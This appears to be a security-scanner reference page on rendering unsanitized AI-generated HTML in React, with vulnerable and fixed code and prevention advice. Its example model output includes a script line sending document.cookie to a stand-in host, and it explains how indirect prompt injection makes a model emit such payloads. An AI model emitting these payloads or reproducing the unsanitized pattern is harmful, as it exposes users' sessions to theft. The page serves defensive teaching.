Medium · CWE-79 · OWASP LLM02:2025

No AI Output Sanitization

LLM-generated HTML or code is rendered directly in the UI without sanitization, opening the door to stored XSS attacks.

How It Works

If your app asks an LLM to generate HTML content (emails, reports, rendered markdown) and you inject it into the page with dangerouslySetInnerHTML or innerHTML without stripping malicious tags, an attacker can use prompt injection to make the model emit a script tag. That script then runs in the browser of every user who views the content.
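To make the failure mode concrete, here is a minimal sketch. The `toyMarkdownToHtml` function below is illustrative only, but it mimics the relevant behavior of real converters such as marked under default options: raw inline HTML in the markdown is passed through to the output untouched, so an injected script tag survives the conversion.

```javascript
// Illustrative only: a toy markdown converter that, like marked's default
// behavior, passes raw inline HTML through to the output untouched.
function toyMarkdownToHtml(md) {
  return md
    .replace(/^# (.+)$/gm, '<h1>$1</h1>')    // headings
    .replace(/\*\*(.+?)\*\*/g, '<b>$1</b>'); // bold; raw HTML is left as-is
}

// Output the model might produce after an indirect prompt injection:
const aiGeneratedMarkdown = [
  '# Quarterly Report',
  'Revenue was **up 12%**.',
  '<script>fetch("https://evil.example/?c=" + document.cookie)</script>',
].join('\n');

const html = toyMarkdownToHtml(aiGeneratedMarkdown);
console.log(html.includes('<script>')); // → true: the payload survives conversion
```

If this HTML is then stored and rendered for other users, the injected script executes in each of their sessions.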

Vulnerable Code
// BAD: rendering AI-generated markdown as HTML without sanitization
import { marked } from 'marked';

const aiHtml = marked(aiGeneratedMarkdown); // converts markdown to HTML; raw HTML passes through
return <div dangerouslySetInnerHTML={{ __html: aiHtml }} />;
Secure Code
// GOOD: sanitize the HTML after markdown conversion
import DOMPurify from 'dompurify';
import { marked } from 'marked';

const rawHtml = marked(aiGeneratedMarkdown);
const safeHtml = DOMPurify.sanitize(rawHtml, { USE_PROFILES: { html: true } });
return <div dangerouslySetInnerHTML={{ __html: safeHtml }} />;

Real-World Example

Researchers showed that AI writing assistants generating HTML content could be manipulated via indirect prompt injection to include XSS payloads. If that content is stored and shown to other users, it becomes a stored XSS vulnerability at scale.

How to Prevent It

  • Always run AI-generated HTML through DOMPurify before using dangerouslySetInnerHTML
  • Use a Content Security Policy (CSP) that blocks inline scripts as a defense-in-depth measure
  • Consider using a markdown renderer that outputs sanitized HTML by default (like rehype-sanitize)
  • Validate that AI output only contains expected HTML elements for your use case
  • Log AI outputs that contain suspicious patterns (script tags, event handlers) for review
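The last two bullets can be sketched together: a small detector that flags classic XSS patterns in AI output so it can be logged for review. The pattern list here is a hypothetical starting point, and this is a monitoring aid, not a substitute for DOMPurify.

```javascript
// Flag AI output containing classic XSS patterns for logging/review.
// Run this in addition to sanitization, never instead of it.
const SUSPICIOUS = [
  /<script\b/i,   // script tags
  /\bon\w+\s*=/i, // inline event handlers (onerror=, onclick=, ...)
  /javascript:/i, // javascript: URLs
  /<iframe\b/i,   // embedded frames
];

function findSuspiciousPatterns(html) {
  // Return the source of every pattern that matched, for log messages.
  return SUSPICIOUS.filter((re) => re.test(html)).map((re) => re.source);
}

const hits = findSuspiciousPatterns('<img src=x onerror=alert(1)>');
console.log(hits); // flags the inline event handler
```

Logging these hits gives you an audit trail of attempted injections even when sanitization silently strips the payload.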

Affected Technologies

Node.js · React

Data Hogo detects this vulnerability automatically.
